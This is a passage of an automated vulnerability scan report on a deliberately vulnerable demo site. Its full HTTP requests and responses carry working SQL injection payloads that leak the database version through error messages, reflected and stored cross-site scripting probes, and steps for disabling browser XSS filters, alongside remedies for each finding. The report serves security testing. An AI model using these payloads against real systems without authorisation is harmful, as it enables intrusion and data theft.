Cookie: ASP.NET_SessionId=eykomas2qwtytb2b4i3u3rvj; VisitStart=8/25/2014 10:57:52 PM; AuthCookie=70C1996BFE542E03455FD23A7DF6BAFC4683ACDAB380D9E50281255EC813210887335C804EE36FD13E32AAE41FB0A940B85A5E23846F83F5CC500E6F0D9E1353EFFD9B6AB3040E3CFADA99D3AD65DC3633FD92922B61E8A18F9DD0EF1C993A17FC47536EBB3714036FB3E3DBCD43CB7CF0621AE2D60D3A13BEFA9CDA66241A7D; Password=Mw==; Email=netsparker@example.com; ARRAffinity=676a03b62014623bb78415d33912c3b249f249141dd561816e83926ee7df9d29
Accept-Encoding: gzip, deflate
Response
…30319
X-Powered-By: ASP.NET
Content-Length: 14154
Content-Type: text/html; charset=utf-8

<!DOCTYPE html><html><head><title>Conversion failed when converting the varchar value '_!@2dilemma' to data type int.</title><meta name="viewport" content="width=device-width" /><style>body {font-family:"Verdana";font-weight:normal;font-size: .7em;color:black;}
…<body bgcolor="white">
<span><H1>Server Error in '/' Application.<hr width=100% size=1 color=silver></H1>
<h2> <i>Conversion failed when converting the varchar value '_!@2dilemma' to data type int.</i> </h2></span>
<font face="Arial, Helvetica, Geneva, SunSans-Regular, sans-serif ">
<b> Description: </b>An unhandled exception occurred during the …e error and where it originated in the code.
<br><br>
<b> Exception Details: </b>System.Data.SqlClient.SqlException: Conversion failed when converting the varchar value '_!@2dilemma' to data type int.<br><br>
<b>Source Error:</b> <br><br>
<table width=100% bgcolor="#ffffcc"><tr><td><code>
…e width=100% bgcolor="#ffffcc"><tr><td><code><pre>
[SqlException (0x80131904): Conversion failed when converting the varchar value &#39;_!@2dilemma&#39; to data type int.]
   System.Data.SqlClient.SqlConnection.OnError(SqlException exception, Boolean breakConnection, Action`1 wrapCloseInAction) +1787814
   System.Data.SqlClient.SqlInternalConn…osoft .NET Framework Version:4.0.30319; ASP.NET Version:4.0.30319.36213
</font>
</body></html><!-- [SqlException]: Conversion failed when converting the varchar value &#39;_!@2dilemma&#39; to data type int.
   at System.Data.SqlClient.SqlConnection.OnError(SqlException exception, Boolean breakConnection, Action`1 wrapCloseInAction)
   at System.Data.SqlClient.SqlInternalConnecti…
2.4 /Make/3 CONFIRMED
http://hackyourselffirst.troyhunt.com/Make/3?orderby=(select+convert(int%2cCHAR(95)%2bCHAR(33)%2bCHA
Parameters
Parameter  Type  Value
orderby  GET  (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR
Extracted Data: microsoft sql azure (rtm) - 11.0.9222.17 <br> aug 20 2014 22:37:56 <br> copyright (c) microsoft corporation<br>
Request
GET /Make/3?orderby=(select+convert(int%2cCHAR(95)%2bCHAR(33)%2bCHAR(64)%2bCHAR(50)%2bCHAR(100)%2bCHAR(105)%2bCHAR(108)%2bCHAR(101)%2bCHAR(109)%2bCHAR(109)%2bCHAR(97))+FROM+syscolumns) HTTP/1.1
Cache-Control: no-cache
Referer: http://hackyourselffirst.troyhunt.com/
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1750.170 Safari/537.36
Accept-Language: en-us,en;q=0.5
X-Scanner: Netsparker
Host: hackyourselffirst.troyhunt.com
Cookie: ASP.NET_SessionId=eykomas2qwtytb2b4i3u3rvj; VisitStart=8/25/2014 10:57:52 PM; AuthCookie=70C1996BFE542E03455FD23A7DF6BAFC4683ACDAB380D9E50281255EC813210887335C804EE36FD13E32AAE41FB0A940B85A5E23846F83F5CC500E6F0D9E1353EFFD9B6AB3040E3CFADA99D3AD65DC3633FD92922B61E8A18F9DD0EF1C993A17FC47536EBB3714036FB3E3DBCD43CB7CF0621AE2D60D3A13BEFA9CDA66241A7D; Password=Mw==; Email=netsparker@example.com; ARRAffinity=676a03b62014623bb78415d33912c3b249f249141dd561816e83926ee7df9d29
Accept-Encoding: gzip, deflate
Response
…30319
X-Powered-By: ASP.NET
Content-Length: 14154
Content-Type: text/html; charset=utf-8

<!DOCTYPE html><html><head><title>Conversion failed when converting the varchar value '_!@2dilemma' to data type int.</title><meta name="viewport" content="width=device-width" /><style>body {font-family:"Verdana";font-weight:normal;font-size: .7em;color:black;}
…<body bgcolor="white">
<span><H1>Server Error in '/' Application.<hr width=100% size=1 color=silver></H1>
<h2> <i>Conversion failed when converting the varchar value '_!@2dilemma' to data type int.</i> </h2></span>
<font face="Arial, Helvetica, Geneva, SunSans-Regular, sans-serif ">
<b> Description: </b>An unhandled exception occurred during the …e error and where it originated in the code.
<br><br>
<b> Exception Details: </b>System.Data.SqlClient.SqlException: Conversion failed when converting the varchar value '_!@2dilemma' to data type int.<br><br>
<b>Source Error:</b> <br><br>
<table width=100% bgcolor="#ffffcc"><tr><td><code>
…e width=100% bgcolor="#ffffcc"><tr><td><code><pre>
[SqlException (0x80131904): Conversion failed when converting the varchar value &#39;_!@2dilemma&#39; to data type int.]
   System.Data.SqlClient.SqlConnection.OnError(SqlException exception, Boolean breakConnection, Action`1 wrapCloseInAction) +1787814
   System.Data.SqlClient.SqlInternalConn…osoft .NET Framework Version:4.0.30319; ASP.NET Version:4.0.30319.36213
</font>
</body></html><!-- [SqlException]: Conversion failed when converting the varchar value &#39;_!@2dilemma&#39; to data type int.
   at System.Data.SqlClient.SqlConnection.OnError(SqlException exception, Boolean breakConnection, Action`1 wrapCloseInAction)
   at System.Data.SqlClient.SqlInternalConnecti…
2.5 /Make/1 CONFIRMED
http://hackyourselffirst.troyhunt.com/Make/1?orderby=(select+convert(int%2cCHAR(95)%2bCHAR(33)%2bCHA
Parameters
Parameter  Type  Value
orderby  GET  (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR
Extracted Data: microsoft sql azure (rtm) - 11.0.9222.17 <br> aug 20 2014 22:37:56 <br> copyright (c) microsoft corporation<br>
Request
GET /Make/1?orderby=(select+convert(int%2cCHAR(95)%2bCHAR(33)%2bCHAR(64)%2bCHAR(50)%2bCHAR(100)%2bCHAR(105)%2bCHAR(108)%2bCHAR(101)%2bCHAR(109)%2bCHAR(109)%2bCHAR(97))+FROM+syscolumns) HTTP/1.1
Cache-Control: no-cache
Referer: http://hackyourselffirst.troyhunt.com/
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1750.170 Safari/537.36
Accept-Language: en-us,en;q=0.5
X-Scanner: Netsparker
Host: hackyourselffirst.troyhunt.com
Cookie: ASP.NET_SessionId=eykomas2qwtytb2b4i3u3rvj; VisitStart=8/25/2014 10:57:52 PM; AuthCookie=70C1996BFE542E03455FD23A7DF6BAFC4683ACDAB380D9E50281255EC813210887335C804EE36FD13E32AAE41FB0A940B85A5E23846F83F5CC500E6F0D9E1353EFFD9B6AB3040E3CFADA99D3AD65DC3633FD92922B61E8A18F9DD0EF1C993A17FC47536EBB3714036FB3E3DBCD43CB7CF0621AE2D60D3A13BEFA9CDA66241A7D; Password=Mw==; Email=netsparker@example.com; ARRAffinity=676a03b62014623bb78415d33912c3b249f249141dd561816e83926ee7df9d29
Accept-Encoding: gzip, deflate
Response
…30319
X-Powered-By: ASP.NET
Content-Length: 14154
Content-Type: text/html; charset=utf-8

<!DOCTYPE html><html><head><title>Conversion failed when converting the varchar value '_!@2dilemma' to data type int.</title><meta name="viewport" content="width=device-width" /><style>body {font-family:"Verdana";font-weight:normal;font-size: .7em;color:black;}
…<body bgcolor="white">
<span><H1>Server Error in '/' Application.<hr width=100% size=1 color=silver></H1>
<h2> <i>Conversion failed when converting the varchar value '_!@2dilemma' to data type int.</i> </h2></span>
<font face="Arial, Helvetica, Geneva, SunSans-Regular, sans-serif ">
<b> Description: </b>An unhandled exception occurred during the …e error and where it originated in the code.
<br><br>
<b> Exception Details: </b>System.Data.SqlClient.SqlException: Conversion failed when converting the varchar value '_!@2dilemma' to data type int.<br><br>
<b>Source Error:</b> <br><br>
<table width=100% bgcolor="#ffffcc"><tr><td><code>
…e width=100% bgcolor="#ffffcc"><tr><td><code><pre>
[SqlException (0x80131904): Conversion failed when converting the varchar value &#39;_!@2dilemma&#39; to data type int.]
   System.Data.SqlClient.SqlConnection.OnError(SqlException exception, Boolean breakConnection, Action`1 wrapCloseInAction) +1787814
   System.Data.SqlClient.SqlInternalConn…osoft .NET Framework Version:4.0.30319; ASP.NET Version:4.0.30319.36213
</font>
</body></html><!-- [SqlException]: Conversion failed when converting the varchar value &#39;_!@2dilemma&#39; to data type int.
   at System.Data.SqlClient.SqlConnection.OnError(SqlException exception, Boolean breakConnection, Action`1 wrapCloseInAction)
   at System.Data.SqlClient.SqlInternalConnecti…
IMPORTANT: 1 TOTAL, 1 CONFIRMED
3. Cross-site Scripting
Netsparker detected cross-site scripting, which allows an attacker to execute a dynamic script (JavaScript, VBScript) in the context of the application.
This allows several different attack opportunities, mostly hijacking the current session of the user or changing the look of the page by changing the HTML on the fly to steal the user's credentials. This happens because the input entered by a user has been interpreted as HTML/JavaScript/VBScript by the browser. Cross-site scripting targets the users of the application instead of the server. Although this is a limitation, since it allows attackers to hijack other users' sessions, an attacker might attack an administrator to gain full control over the application.
Impact
There are many different attacks that can be leveraged through the use of cross-site scripting, including:
Hijacking user's active session
Mounting phishing attacks
Intercepting data and performing man-in-the-middle attacks
Remedy
The issue occurs because the browser interprets the input as active HTML, JavaScript or VBScript. To avoid this, output should be encoded according to the output location and context. For example, if the output goes into a JavaScript block within the HTML document, then output needs to be encoded accordingly. Encoding can get very complex, therefore it's strongly recommended to use an encoding library such as OWASP ESAPI and Microsoft Anti-cross-site scripting.
Remedy References
Microsoft Anti-XSS Library
OWASP XSS Prevention Cheat Sheet
OWASP AntiSamy Java
External References
XSS Cheat Sheet
OWASP - cross-site scripting
XSS Shell
XSS Tunnelling
Proof of Concept Notes
Generated XSS exploit might not work due to browser XSS filtering. Please follow the guidelines below in order to disable XSS filtering for different browsers. Also note that XSS filtering is a feature that's enabled by default in some of the modern browsers. It should only be disabled temporarily to test exploits and should be reverted back if the browser is actively used other than for testing purposes. Even though browsers have certain checks to prevent cross-site scripting attacks, in practice there are a variety of ways to bypass this mechanism, therefore a web application should not rely on this kind of client-side browser checks.
Chrome
Open command prompt. Go to the folder where chrome.exe is located. Run the command: chrome.exe --args --disable-xss-auditor
Internet Explorer
Click Tools -> Internet Options and then navigate to the Security tab. Click Custom level and scroll towards the bottom, where you will find that Enable XSS filter is currently Enabled. Set it to Disabled. Click OK. Click Yes to accept the warning, followed by Apply.
Firefox
Go to about:config in the URL address bar. In the search field type urlbar.filter and find browser.urlbar.filter.javascript. Set its value to false by double clicking the row.
Classification
OWASP 2010-A2, OWASP 2013-A3, PCI V2.0-6.5.7, PCI V3.0-6.5.7, CWE-79, CAPEC-19, WASC-08
3.1 /Search CONFIRMED
http://hackyourselffirst.troyhunt.com/Search?searchTerm='%2Bnetsparker(9)%2B'
Parameters
Parameter  Type  Value
searchTerm  GET  '+netsparker(9)+'
Request
GET /Search?searchTerm='%2Bnetsparker(9)%2B' HTTP/1.1
Cache-Control: no-cache
Referer: http://hackyourselffirst.troyhunt.com/
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1750.170 Safari/537.36
Accept-Language: en-us,en;q=0.5
X-Scanner: Netsparker
Host: hackyourselffirst.troyhunt.com
Cookie: ASP.NET_SessionId=eykomas2qwtytb2b4i3u3rvj; VisitStart=8/25/2014 10:57:52 PM; AuthCookie=70C1996BFE542E03455FD23A7DF6BAFC4683ACDAB380D9E50281255EC813210887335C804EE36FD13E32AAE41FB0A940B85A5E23846F83F5CC500E6F0D9E1353EFFD9B6AB3040E3CFADA99D3AD65DC3633FD92922B61E8A18F9DD0EF1C993A17FC47536EBB3714036FB3E3DBCD43CB7CF0621AE2D60D3A13BEFA9CDA66241A7D; Password=Mw==; Email=netsparker@example.com; ARRAffinity=676a03b62014623bb78415d33912c3b249f249141dd561816e83926ee7df9d29
Accept-Encoding: gzip, deflate
Response
…</section></div></div></div></div></header>
<div class="container"><section>
<h2>You searched for &quot;<span id="searchTerm">'+netsparker(9)+'</span>&quot;</h2>
<p class="alert alert-error">No results found for your search</p>
</section><hr /><footer><p>&copy; 2014 - Hack Yourself First</p></footer>
…></script>
<script>$('#results tr').click(function () { var url = '/Supercar/' + $(this).attr('id'); window.location.href = url; });
$('#searchTerm').val(''+netsparker(9)+'');</script>
<script>(function (i, s, o, g, r, a, m) { i['GoogleAnalyticsObject'] = r; i[r] = i[r] || function () { (i[r].q = i[r].q || []).push(arguments) }, i[r…
IMPORTANT: 1 TOTAL, 1 CONFIRMED
4. Permanent Cross-site Scripting
Netsparker identified permanent cross-site scripting and confirmed this vulnerability by analyzing the execution of injected JavaScript.
Permanent XSS allows an attacker to execute dynamic scripts (JavaScript, VBScript) in the context of the application. This allows several different attack opportunities, mostly hijacking the current session of the user or changing the look of the page by changing the HTML on the fly to steal the user's credentials. This happens because the input entered by the user has been interpreted as HTML/JavaScript/VBScript within the browser.
Permanent means that the attack will be stored in the backend system. In normal XSS attacks an attacker needs to e-mail the victim, but in a permanent XSS an attacker can just execute the attack and wait for users to see the affected page. As soon as someone visits the page, the attacker's stored payload will get executed.
XSS targets the users of the application instead of the server. Although this is a limitation, since it only allows attackers to hijack other users' sessions, the attacker might attack an administrator to gain full control over the application.
Impact
Permanent XSS is a dangerous issue that has many exploitation vectors, some of which include:
Users' session-sensitive information, such as cookies, can be stolen.
XSS can enable client-side worms, which could modify, delete or steal other users' data within the application.
The website can be redirected to a new location, defaced or used as a phishing site.
Remedy
The issue occurs because the browser interprets the input as active HTML, JavaScript or VBScript. To avoid this, all input and output from the application should be filtered. Output should be filtered according to the output format and location. Typically the output location is HTML. Where the output is HTML, ensure all active content is removed prior to its presentation to the server.
Prior to sanitizing user input, ensure you have a pre-defined list of both expected and acceptable characters with which you populate a whitelist. This list needs only be defined once and should be used to sanitize and validate all subsequent input.
There are a number of pre-defined, well structured whitelist libraries available for many different environments; good examples of these include the OWASP Reform and Microsoft Anti-cross-site scripting libraries.
Remedy References
[ASP.NET] - Microsoft Anti-XSS Library
OWASP XSS Prevention Cheat Sheet
OWASP AntiSamy Java
External References
XSS Cheat Sheet
OWASP - Cross-site Scripting
XSS Shell
XSS Tunnelling
Classification
OWASP 2010-A2, OWASP 2013-A3, PCI V2.0-6.5.7, PCI V3.0-6.5.7, CWE-79, CAPEC-19, WASC-08
4.1 /Supercar/3 CONFIRMED
http://hackyourselffirst.troyhunt.com/Supercar/3
Injection URL: http://hackyourselffirst.troyhunt.com/api/vote
Injection Request
POST /api/vote HTTP/1.1
Cache-Control: no-cache
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1750.170 Safari/537.36
Accept: */*
Origin: http://hackyourselffirst.troyhunt.com
Referer: http://hackyourselffirst.troyhunt.com/Supercar/3
X-Requested-With: XMLHttpRequest
Accept-Language: en-us,en;q=0.5
X-Scanner: Netsparker
Host: hackyourselffirst.troyhunt.com
Cookie: ASP.NET_SessionId=eykomas2qwtytb2b4i3u3rvj; VisitStart=8/25/2014 10:57:52 PM; AuthCookie=70C1996BFE542E03455FD23A7DF6BAFC4683ACDAB380D9E50281255EC813210887335C804EE36FD13E32AAE41FB0A940B85A5E23846F83F5CC500E6F0D9E1353EFFD9B6AB3040E3CFADA99D3AD65DC3633FD92922B61E8A18F9DD0EF1C993A17FC47536EBB3714036FB3E3DBCD43CB7CF0621AE2D60D3A13BEFA9CDA66241A7D; Password=Mw==; Email=netsparker@example.com; ARRAffinity=676a03b62014623bb78415d33912c3b249f249141dd561816e83926ee7df9d29
Accept-Encoding: gzip, deflate
Content-Length: 77
Content-Type: application/x-www-form-urlencoded; charset=UTF-8

userId=1&supercarId=3&comments=%22%3e%3cnet+sparker%3dnetsparker(0x00043F)%3e
Identification Request
GET /Supercar/3 HTTP/1.1
Cache-Control: no-cache
Referer: http://hackyourselffirst.troyhunt.com/
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1750.170 Safari/537.36
Accept-Language: en-us,en;q=0.5
X-Scanner: Netsparker
Host: hackyourselffirst.troyhunt.com
Cookie: ASP.NET_SessionId=eykomas2qwtytb2b4i3u3rvj; VisitStart=8/25/2014 10:57:52 PM; AuthCookie=70C1996BFE542E03455FD23A7DF6BAFC4683ACDAB380D9E50281255EC813210887335C804EE36FD13E32AAE41FB0A940B85A5E23846F83F5CC500E6F0D9E1353EFFD9B6AB3040E3CFADA99D3AD65DC3633FD92922B61E8A18F9DD0EF1C993A17FC47536EBB3714036FB3E3DBCD43CB7CF0621AE2D60D3A13BEFA9CDA66241A7D; Password=Mw==; Email=netsparker@example.com; ARRAffinity=676a03b62014623bb78415d33912c3b249f249141dd561816e83926ee7df9d29
Accept-Encoding: gzip, deflate
Injection Response
HTTP/1.1 201 Created
Cache-Control: no-cache
Date: Mon, 25 Aug 2014 23:20:53 GMT
Pragma: no-cache
Server: Microsoft-IIS/8.0
X-XSS-Protection: 0
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Content-Length: 0
Expires: -1
Identification Response
…1)) AND ISNULL(ASCII(SUBSTRING(CAST((SELECT @@version) AS varchar(8000)),1,1)),0)=1</td></tr><tr><td>Troy Hunt</td><td>"><net sparker="netsparker(0x00043F)"></td></tr><tr><td>Troy Hunt</td><td>-1 OR 1=1) AND ISNULL(ASCII(SUBSTRING(CAST((SELECT @@version) AS varchar(8000)…
IMPORTANT: 1 TOTAL, 1 CONFIRMED
5. Password Transmitted over HTTP
Netsparker detected that password data is being transmitted over HTTP.
Impact
If an attacker can intercept network traffic, he/she can steal users' credentials.
Actions to Take
1. See the remedy for solution.
2. Move all of your critical forms and pages to HTTPS and do not serve them over HTTP.
Remedy
All sensitive data should be transferred over HTTPS rather than HTTP. Forms should be served over HTTPS. All aspects of the application that accept user input, starting from the login process, should only be served over HTTPS.
Classification
OWASP 2010-A9, OWASP 2013-A6, PCI V2.0-6.5.4, PCI V3.0-6.5.4, CWE-319, CAPEC-65, WASC-04
5.1 /Account/Register CONFIRMED
http://hackyourselffirst.troyhunt.com/Account/Register
Form target action: http://hackyourselffirst.troyhunt.com/Account/Register
Request
GET /Account/Register HTTP/1.1
Cache-Control: no-cache
Referer: http://hackyourselffirst.troyhunt.com/
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1750.170 Safari/537.36
Accept-Language: en-us,en;q=0.5
X-Scanner: Netsparker
Host: hackyourselffirst.troyhunt.com
Cookie: ASP.NET_SessionId=eykomas2qwtytb2b4i3u3rvj; VisitStart=8/25/2014 10:57:52 PM; AuthCookie=57007E5718C949BB9DC8E5A74B45AFB8C217ACFD8FD98F8023C637FF8D1BABD440D2F2AD0AF35F86E8F32E6C454628305E619D8676ED718595618D220E725F2F5813F5A4B4604461ADB93EF796E499FE922687BE7848361F0CDEE483E11F997A92B2760021E9744C920EF124EEE2381E87A6A46642104F351292394B396FA228; ARRAffinity=676a03b62014623bb78415d33912c3b249f249141dd561816e83926ee7df9d29
Accept-Encoding: gzip, deflate
Response
HTTP/1.1 200 OK
Cache-Control: private
Date: Mon, 25 Aug 2014 22:58:38 GMT
Vary: Accept-Encoding
Server: Microsoft-IIS/8.0
X-XSS-Protection: 0
X-AspNetMvc-Version: 5.1
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Content-Encoding: 
Content-Length: 2265
Content-Type: text/html; charset=utf-8

<!DOCTYPE html><html lang="en"><head><meta charset="utf-8" /><title>Register - Supercar Showdown</title><link href="/favicon.ico" rel="shortcut icon" type="image/x-icon" /><meta name="viewport" content="width=device-width" /><link href="/Content/site?v=94ys6lTNFlsmnNPD5EyUiGtWGzSZmuEQGdWkL_-WEEI1" rel="stylesheet"/>
</head><body><header class="navbar-wrapper"><div class="container"><div class="navbar navbar-inverse"><div class="navbar-inner"><button type="button" class="btn btn-navbar" data-toggle="collapse" data-target=".nav-collapse"><span class="icon-bar"></span><span class="icon-bar"></span><span class="icon-bar"></span></button><a class="brand" href="http://hackyourselffirst.troyhunt.com/">Supercar Showdown</a><div class="nav-collapse collapse"><ul class="nav"><li><a href="http://hackyourselffirst.troyhunt.com/SupercarLeaderboard">Leaderboard</a></li><li class="dropdown"><a href="#" class="dropdown-toggle" data-toggle="dropdown">My account <b class="caret"></b></a><ul class="dropdown-menu"><form action="http://hackyourselffirst.troyhunt.com/Account/LogOff" id="logoutForm" method="post" class="navbar-form"></form><li><a href="https://hackyourselffirst.troyhunt.com/Account/ChangePassword">Change password</a></li><li><a href="http://hackyourselffirst.troyhunt.com/Account/UserProfile">Edit profile</a></li>
…
IMPORTANT: 1 TOTAL, 1 CONFIRMED
6. Cookie Not Marked as Secure
Netsparker identified a cookie not marked as secure, and transmitted over HTTPS.
This means the cookie could potentially be stolen by an attacker who can successfully intercept and decrypt the traffic, or following a successful man-in-the-middle attack.
Impact
This cookie will be transmitted over a HTTP connection, therefore if this cookie is important (such as a session cookie), an attacker might intercept it and hijack a victim's session. If the attacker can carry out a man-in-the-middle attack, he/she can force the victim to make an HTTP request to steal the cookie.
Actions to Take
1. See the remedy for solution.
2. Mark all cookies used within the application as secure. (If the cookie is not related to authentication or does not carry any personal information, you do not have to mark it as secure.)
Remedy
Mark all cookies used within the application as secure.
Required Skills for Successful Exploitation
To exploit this issue, the attacker needs to be able to intercept traffic. This generally requires local access to the web server or to the victim's network. Attackers need to understand layer 2, have physical access to systems either as waypoints for the traffic, or have locally gained access to a system between the victim and the web server.
External References
.NET Cookie.Secure Property
How to Create Totally Secure Cookies
Classification
OWASP 2010-A9, OWASP 2013-A6, PCI V2.0-6.5.4, PCI V3.0-6.5.4, CWE-614, CAPEC-102, WASC-15
6.1 /Account/Login CONFIRMED
https://hackyourselffirst.troyhunt.com/Account/Login
Identified Cookie: AuthCookie
Request
POST /Account/Login HTTP/1.1
Cache-Control: no-cache
Referer: http://hackyourselffirst.troyhunt.com/Account/Login
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1750.170 Safari/537.36
Accept-Language: en-us,en;q=0.5
X-Scanner: Netsparker
Host: hackyourselffirst.troyhunt.com
Cookie: ASP.NET_SessionId=eykomas2qwtytb2b4i3u3rvj; VisitStart=8/25/2014 10:57:52 PM; AuthCookie=EA9A3D322DD4B030B3239FA3119364226C4AFC1146DACC18C04B897769A79F835F0F451B34A8B312CD8F5A77E3B5421B58074E3E4C68E5FA779CCC709E259C828EFF4936F4BB152D308EA778C82324B3CAF1BA60C0C18C134AEB7C5A5153AF181C536B617EF3F6DFB1052DDB94CFEB3F91DCFE08967136E4266A5E8249781E2F; ARRAffinity=676a03b62014623bb78415d33912c3b249f249141dd561816e83926ee7df9d29
Accept-Encoding: gzip, deflate
Content-Length: 57
Content-Type: application/x-www-form-urlencoded

Email=netsparker%40example.com&Password=3&RememberMe=true
Response
HTTP/1.1 302 Found
Cache-Control: private
Date: Mon, 25 Aug 2014 22:59:00 GMT
Location: http://hackyourselffirst.troyhunt.com/
Server: Microsoft-IIS/8.0
Set-Cookie: AuthCookie=83F87081CDBC4CAC96FBBA3C773F139F952893E2A76E1B1AD3A6E8C32B935F9A14A7467ADD80BBC637E096BB698E00D1E437A060334677EA4A758738F5F619C1C59687F889818B80FF72D699D7B9FEA6F2F89F33E2A38DABBD39EEE2F5538787A104A63D8131741D813003A6B1E980EF52692C81A2395EB8B18B21613B890AF7; expires=Tue, 25-Aug-2015 22:59:00 GMT; path=/
            Password=Mw==; expires=Tue, 25-Aug-2015 22:59:00 GMT; path=/
            Email=netsparker@example.com; expires=Tue, 25-Aug-2015 22:59:00 GMT; path=/
X-XSS-Protection: 0
X-AspNetMvc-Version: 5.1
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Content-Length: 155
Content-Type: text/html; charset=utf-8

<html><head><title>Object moved</title></head><body><h2>Object moved to <a href="http://hackyourselffirst.troyhunt.com/">here</a>.</h2></body></html>
IMPORTANT: 1 TOTAL
7. Out-of-date Version (Microsoft SQL Server)
Netsparker identified you are using an out-of-date version of Microsoft SQL.
Impact
Since this is an old version of the software, it may be vulnerable to attacks.
Remedy
Please upgrade your installation of Microsoft SQL Server to the latest stable version.
Classification
OWASP 2010-A6, OWASP 2013-A9, PCI V2.0-6.1, PCI V3.0-6.1, CAPEC-310
7.1 /Make/1
http://hackyourselffirst.troyhunt.com/Make/1?orderby=(select+convert(int%2cCHAR(95)%2bCHAR(33)%2bCHA
Identified Version: 11.0.9222.17
Latest Version: 12.0.2000
Vulnerability Database: Result is based on 18/08/2014 vulnerability database content.
Certainty
Request
GET /Make/1?orderby=(select+convert(int%2cCHAR(95)%2bCHAR(33)%2bCHAR(64)%2bCHAR(50)%2bCHAR(100)%2bCHAR(105)%2bCHAR(108)%2bCHAR(101)%2bCHAR(109)%2bCHAR(109)%2bCHAR(97))+FROM+syscolumns) HTTP/1.1
Cache-Control: no-cache
Referer: http://hackyourselffirst.troyhunt.com/
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1750.170 Safari/537.36
Accept-Language: en-us,en;q=0.5
X-Scanner: Netsparker
Host: hackyourselffirst.troyhunt.com
Cookie: ASP.NET_SessionId=eykomas2qwtytb2b4i3u3rvj; VisitStart=8/25/2014 10:57:52 PM; AuthCookie=70C1996BFE542E03455FD23A7DF6BAFC4683ACDAB380D9E50281255EC813210887335C804EE36FD13E32AAE41FB0A940B85A5E23846F83F5CC500E6F0D9E1353EFFD9B6AB3040E3CFADA99D3AD65DC3633FD92922B61E8A18F9DD0EF1C993A17FC47536EBB3714036FB3E3DBCD43CB7CF0621AE2D60D3A13BEFA9CDA66241A7D; Password=Mw==; Email=netsparker@example.com; ARRAffinity=676a03b62014623bb78415d33912c3b249f249141dd561816e83926ee7df9d29
Accept-Encoding: gzip, deflate
Response
HTTP/1.1 500 Internal Server Error
Cache-Control: private
Date: Mon, 25 Aug 2014 22:59:55 GMT
Server: Microsoft-IIS/8.0
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Content-Length: 14154
Content-Type: text/html; charset=utf-8

<!DOCTYPE html><html><head><title>Conversion failed when converting the varchar value '_!@2dilemma' to data type int.</title><meta name="viewport" content="width=device-width" /><style>body {font-family:"Verdana";font-weight:normal;font-size: .7em;color:black;} p {font-family:"Verdana";font-weight:normal;color:black;margin-top: -5px} b {font-family:"Verdana";font-weight:bold;color:black;margin-top: -5px} H1 { font-family:"Verdana";font-weight:normal;font-size:18pt;color:red } H2 { font-family:"Verdana";font-weight:normal;font-size:14pt;color:maroon } pre {font-family:"Consolas","Lucida Console",Monospace;font-size:11pt;margin:0;padding:0.5em;line-height:14pt} .marker {font-weight: bold; color: black;text-decoration: none;} .version {color: gray;} .error {margin-bottom: 10px;} .expandable { text-decoration:underline; font-weight:bold; color:navy; cursor:hand; } @media screen and (max-width: 639px) { pre { width: 440px; overflow: auto; white-space: pre-wrap; word-wrap: break-word; } } @media screen and (max-width: 479px) { pre { width: 280px; } } </style></head>
<body bgcolor="white">
<span><H1>Server Error in '/' Application.<hr width=100% size=1 color=silver></H1>
<h2> <i>Conversion failed when converting the varchar value '_!@2dilemma' to data type int.</i> </h2></span>
<font face="Arial, Helvetica, Geneva, SunSans-Regular, sans-serif ">
<b> Description: </b>An unhandled exception occurred during the execution of the current web request. Please revie…
MEDIUM: 1 TOTAL, 1 CONFIRMED
8. Critical Form Served over HTTP
Netsparker detected that a critical form is served over HTTP.
Impact
If an attacker can carry out a man-in-the-middle attack, he/she may be able to intercept traffic by injecting JavaScript code into this page or changing the action of the HTTP code to steal the user's password. Even though the target page is HTTPS, this does not protect the system against man-in-the-middle attacks.
This issue is important as it negates the use of SSL as a privacy protection barrier.
Actions to Take
1. See the remedy for solution.
2. Move all of your critical forms to HTTPS and do not allow these pages to be served over HTTP.
Remedy
All sensitive data should be transferred over HTTPS rather than HTTP. Forms should be served over HTTPS. All aspects of the application that accept user input, starting from the login process, should only be served over HTTPS.
Classification
OWASP 2010-A9, OWASP 2013-A6, PCI V2.0-6.5.4, PCI V3.0-6.5.4, CWE-319, CAPEC-65, WASC-04
8.1 /Account/Login CONFIRMED
http://hackyourselffirst.troyhunt.com/Account/Login
Form target action: https://hackyourselffirst.troyhunt.com/Account/Login
Request
GET /Account/Login HTTP/1.1
Cache-Control: no-cache
Referer: http://hackyourselffirst.troyhunt.com/
